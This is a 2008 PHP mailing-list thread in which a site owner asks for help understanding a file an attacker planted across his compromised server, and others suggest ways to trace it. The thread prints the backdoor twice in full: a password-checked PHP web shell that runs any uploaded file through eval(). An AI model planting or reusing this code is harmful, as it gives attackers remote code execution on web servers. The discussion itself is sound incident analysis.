Re: Re: Hack question

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

I've not bothered to try and figure out where it came from because hackers spoof their ID anyhow.

Eric Butera wrote:

On Fri, Apr 18, 2008 at 12:22 PM, Al <news@xxxxxxxxxxxxx> wrote:

I'm continuing to work on this.

 One thing that seems obvious. The code executes the script code, using
eval(), directly from the /tmp dir. So the usual security tests we do prior
to using move_uploaded_file() are useless.



 Al wrote:


I'm still fighting my hack problem on one of my servers. Can anyone help

me figure out what's the purpose of this code.  The hack places this file in
numerous dirs on the site, I assume using a php script because the owner is
"nobody".

I can sort of figure what is doing; but, I can't figure out what the

hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people.

I see no sign that any code is written with by site owner, i.e, ftp. And,
I've looked carefully for suspect php files.



<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) {

echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo
"<pre>"; testdata('start'); if
(md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code =
@fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); };
testdata('end'); echo "</pre>"; ?>



<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
   echo "$t\n";
} ;
function testdata($t)
{
   say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
   if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),

$HTTP_POST_FILES["f"]["size"]))

   {
       eval($code);
   }     else
   {
       testdata('f');
   } ;
} else
{
   testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>


 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php




Maybe you can look at the file time on the script in /tmp and look at
server logs around that same time to see if that is any hint of where
it might have come from.


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux